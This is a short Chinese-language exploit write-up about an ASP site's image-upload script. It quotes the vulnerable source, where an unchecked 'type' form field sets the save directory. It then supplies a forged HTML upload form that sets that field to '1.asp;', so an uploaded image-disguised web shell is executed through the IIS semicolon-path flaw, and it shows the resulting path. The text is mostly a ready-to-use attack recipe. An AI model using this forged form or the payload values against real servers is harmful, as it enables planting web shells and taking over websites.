By:piaoye

    因需要下了源码看了下

    出现在 \inc\img_save.asp 文件

以下是引用片段:

....省略一千万行....
set fs=server.CreateObject("scripting.filesystemobject")
set upload=new upload_5xSoft ''建立上传对象
'--------将日期转化成文件名--------
formPath="/uploadfile/"
formpath2=upload.form("type")  //* BUG出现在这里,type值 从from获得 自定义路径
formPath=formPath&formPath2 //*路径生成。。。。uploadfile+type
if upload.form("adsrc")="" then 
adsrc="ADSrc"
else
adsrc=upload.form("adsrc")
end if
''在目录后加(/)
if right(formPath,1)<>"/" then formPath=formPath&"/"
set file=upload.file("picture") ''生成一个文件对象
if file.FileSize>0 then ''如果 FileSize > 0 说明有文件数据
if file.filesize>300000 then
response.write"<SCRIPT language=JavaScript>alert('上传图片大于规定(300K),请改变文件大小后重新上传!');"
response.write"javascript:history.back(-1)</SCRIPT>"
response.end
end if
FileExt        = Mid(file.Filename, InStrRev(file.Filename, ".")+1)
FileExt        = FixName(FileExt)
If Not ( CheckFileExt(FileExt) ) Then
response.write"<SCRIPT language=JavaScript>alert('上传图片只支持 gif|jpg|jpeg|bmp|png 图象文件!');"
response.write"javascript:history.back(-1)</SCRIPT>"
response.end
end if

thename=MakedownName()&"."&FileExt
'开始判断会员图片目录是否存在
  Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    If objFSO.FolderExists(Server.MapPath(""&formPath&"")) Then'如果存在就直接保存图片
  file.SaveAs Server.mappath(formPath&thename)
  Else
  objFSO.CreateFolder(Server.MapPath(""&formPath&""))'不存在就建一个目录
  file.SaveAs Server.mappath(formPath&thename)
 
  Set Jpeg = Server.CreateObject("Persits.Jpeg") '调用组件
Path = Server.MapPath(formPath&thename) '待处理图片路径
Jpeg.Open Path
If Jpeg.OriginalWidth / Jpeg.OriginalHeight > 1 then
Jpeg.Width = 350
Jpeg.Height = int((350/Jpeg.OriginalWidth)*Jpeg.OriginalHeight)
elseif Jpeg.OriginalWidth / Jpeg.OriginalHeight < 1 then
Jpeg.Height = 350
Jpeg.Width= int(Jpeg.OriginalWidth*(350/Jpeg.Height))
end if

Jpeg.Save Server.MapPath(formPath&thename)

  End If
  Set objFSO = Nothing      '释放 FileSystemObject 对象实例内存空间
imgs=thename
else
response.write"<SCRIPT language=JavaScript>alert('上传文件为空或文件太大!');"
response.write"javascript:history.back(-1)</SCRIPT>"
response.end
end if

%>
<script>
//alert("上传图片成功")
var random = Math.random();
window.opener.document.Form1.<%=adsrc%>.value="<%=formpath%><%=imgs%>";  //* 返回路径、文件名路径
....省略一千万行....

    下来伪造表单提交图片马

以下是引用片段:

<FORM name=formuppic action=http://www.xxxx.com/inc/img_save.asp method=post encType=multipart/form-data>
   <input type="hidden" name="adsrc" value="1.asp;"><input type="hidden" name="type" value="1.asp;">
   <TBODY>
        <TR>
          <TD>上传文件:
    <input type=file name="picture"> <INPUT style="FONT-SIZE: 9pt" type=submit value="确 定" name=submit>
          </TD>
        </TR>
      </TBODY>  </FORM>

    上传后会得到地址:window.opener.document.Form1.1.asp;.value="/uploadfile/1.asp;/2011111990914.jpg";